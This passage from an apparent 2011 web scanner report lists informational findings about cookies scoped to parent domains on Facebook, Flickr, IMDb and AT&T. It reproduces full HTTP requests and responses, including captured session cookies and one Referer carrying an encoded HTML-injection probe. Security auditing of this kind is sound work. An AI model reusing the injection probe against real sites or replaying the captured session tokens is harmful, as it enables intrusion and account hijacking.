Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...

12.67. http://www.facebook.com/profile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php?id=1668500662 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=a.206519616063696.51681.146642365384755
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; wd=1123x954; act=1313433616787%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433616788%2C%22act%22%2C1313433616787%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1668500662%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%7B%22ft%22%3A%7B%22type%22%3A35%7D%2C%22gt%22%3A%7B%7D%7D%2C134%2C877%2C63%2C981%2C16%5D; x-src=%2Fprofile.php%7Calbum_metadata_pagelet

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://pt-br.facebook.com/people/Andr..-Azevedo/1668500662
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.246.60
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:22 GMT
Content-Length: 0


12.68. http://www.flickr.com/flanal_event.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /flanal_event.gne

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flanal_event.gne?target=flickr.soup.abandon&title=Abandonment&rand=0.05619151331484318 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=0fa0umh741480&b=3&s=sk; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:18:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Mon, 12-Aug-2013 18:18:28 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www70.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 1
Via: HTTP/1.1 r09.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.4 [cMsSf ]), HTTP/1.1 r03.ycpi.lax.yahoo.net (YahooTrafficServer/1.20.4 [cMsSf ])
Server: YTS/1.20.4
Proxy-Connection: keep-alive
Content-Length: 0


12.69. http://www.imdb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; cs=9FHDartxepMs4zicyTf0jAhZEiSO2SRj2v5SJImOITet6mUy+I4ChC7ZEhO2mZq0jYqRVA3qUQfuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc17%3Bs%3Dc12%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:23:53 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=gIlM8TPFrbxqJMVtH7h0awfH7bqgkW2M5Pd5qqOiCL0Gxn0a0JFtjZjx5Qqj8l6KI6IuiYAyfomwkW2KB9EtmqCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 79391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/20
...[SNIP]...

12.70. http://www.imdb.com/tv/widget/grid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /tv/widget/grid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/widget/grid?context=rhs_tv_widget&show_episode=1 HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cs=Hmt+tyNJuDdEdOWWQN1wNAbGfbqgkW2NmMHlGqPyXoojoi6JgDJ+ibCRbYoGES2aoJFb/fPXTbqjhMntt9HNyTCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc17%3Bs%3Dc4%3Bs%3Dc12%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:02 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=FJ6+Vfy70D/Z45zlX+GrcwiOAiSO2RITtqma5I26UQQN6lEXrnoBF57ZEhQoWVIEjtkkY9oeAiSISmaH3b/xMimZspfO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 6412

<a name="grid_start" id="grid_start" ref="2011-08-15/2000/Mon. Aug. 15"></a>
<div class="tv_grid">
<div class="tv_channels">
<div id="row_0" onmouseover="if (typeof(imdb_tv_widget_init)!='undefined'){
...[SNIP]...

12.71. http://www.wireless.att.com//store_maintenance/images/att_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/att_logo.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/att_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39777
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:47 GMT
Set-Cookie: B2CSESSIONID=4yhhTJjGBGsT1P!-1971079613; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148125079; path=/
Set-Cookie: DYN_USER_CONFIRM=87ae6569527485e2ef6fe38d1e50f6d7; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701562944; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=2698105223.25115.0000; path=/


                                                                                   
...[SNIP]...

12.72. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/globemaintenance.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/globemaintenance.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=B2MBTJjGtWy6KS!-566915523; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4147529977; path=/
Set-Cookie: DYN_USER_CONFIRM=737fa50353da42a460976241e383a475; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701156621; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=2362560903.25115.0000; path=/


                                                                                   
...[SNIP]...

12.73. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/page_midSlice.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/page_midSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:47 GMT
Set-Cookie: B2CSESSIONID=Jb5MTJjGsjzqYV!-163879780; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148610579; path=/
Set-Cookie: DYN_USER_CONFIRM=d2640787f3179c32006432f0f80a2953; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701106939; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=4090614151.25115.0000; path=/


                                                                                   
...[SNIP]...

12.74. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/page_topSlice.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/page_topSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com
Set-Cookie: TLTSID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com
Set-Cookie: TLTUID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=YZJWTJjGNKsYDb!1152165740; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148392036; path=/
Set-Cookie: DYN_USER_CONFIRM=23349739d9c6714e801b70cc5c02b78d; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701691293; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=3520188807.25115.0000; path=/


                                                                                   
...[SNIP]...

12.75. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/legal/return-policy.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/legal/return-policy.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.3.10.1313431966; TLTHID=8102671EC76B10C7BC7DF17E7E199B90; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A4.6%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A2%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%2C%22f%22%3A1313432588654%7D; __utmc=241758596; fsr.a=1313432596285

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10656
Expires: Mon, 15 Aug 2011 18:22:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:22:23 GMT
Connection: close
Set-Cookie: TLTHID=85646AA0C76B10C7BC67BA17888D1881; Path=/; Domain=.att.com


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<
...[SNIP]...

12.76. http://www.wireless.att.com/cell-phone-service/packages/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/N

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cell-phone-service/packages/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Cnection: close
